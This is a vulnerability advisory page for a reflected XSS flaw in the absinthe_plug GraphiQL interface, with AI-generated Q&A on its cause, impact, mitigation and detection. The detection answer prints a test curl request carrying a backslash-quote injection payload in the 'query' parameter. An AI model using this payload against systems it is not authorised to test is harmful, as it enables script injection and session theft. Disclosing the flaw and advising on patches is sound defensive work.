CVE-2026-42794
Reflected XSS in Absinthe Plug GraphiQL Interface
Publication date: 2026-05-08
Last updated on: 2026-05-08
Assigner: EEF
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| absinthe-graphql | absinthe_plug | From 1.2.0 (inc) to 1.10.2 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a reflected cross-site scripting (XSS) issue in the absinthe-graphql absinthe_plug library, specifically in the GraphiQL interface. The function responsible for escaping input before embedding it in JavaScript strings escapes single quotes and newlines but fails to escape backslashes. An attacker can exploit this by prefixing a quote with a backslash, which breaks out of the intended string context and allows execution of arbitrary JavaScript code in the victim's browser.
How can this vulnerability impact me? :
This vulnerability can allow an attacker to execute arbitrary JavaScript in the context of a victim's browser when they interact with the vulnerable GraphiQL interface. This can lead to theft of sensitive information such as cookies or session tokens, manipulation of the web page content, or performing actions on behalf of the victim, potentially compromising user accounts or data.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include updating the absinthe_plug library to a version that includes the fix for this vulnerability, which properly escapes backslashes in the js_escape function.
If updating is not immediately possible, restrict or disable access to the GraphiQL interface in production environments, as it is typically a developer tool and can be exploited if exposed.
Implementing a Content Security Policy (CSP) can also help mitigate the impact of XSS vulnerabilities by restricting the execution of unauthorized scripts.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The CVE-2026-42794 vulnerability is a reflected cross-site scripting (XSS) issue that allows execution of arbitrary JavaScript in a victim's browser via the GraphiQL interface of absinthe_plug. Such XSS vulnerabilities can lead to unauthorized access to user data or session hijacking.
While the provided information does not explicitly mention compliance with standards like GDPR or HIPAA, XSS vulnerabilities generally pose risks to data confidentiality and integrity, which are critical aspects of these regulations. Exploitation could potentially lead to unauthorized disclosure of personal or sensitive information, thereby impacting compliance.
Mitigation involves updating to a patched version and restricting or disabling the GraphiQL interface in production environments to reduce exposure.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the GraphiQL interface of the absinthe_plug library for reflected cross-site scripting (XSS) via the 'query' GET parameter.
You can attempt to inject a payload that uses a backslash before a quote (e.g., \') in the 'query' parameter to see if it breaks out of the JavaScript string context and executes arbitrary JavaScript.
For example, you can use curl or a browser to send a request like:
- curl -v 'http://yourserver/graphiql?query=\'alert(document.domain)//'
If the response includes the injected script executing or reflected unescaped in the inline JavaScript, the vulnerability is present.
Additionally, monitoring HTTP traffic for suspicious query parameters containing backslash-escaped quotes in GraphiQL requests may help detect exploitation attempts.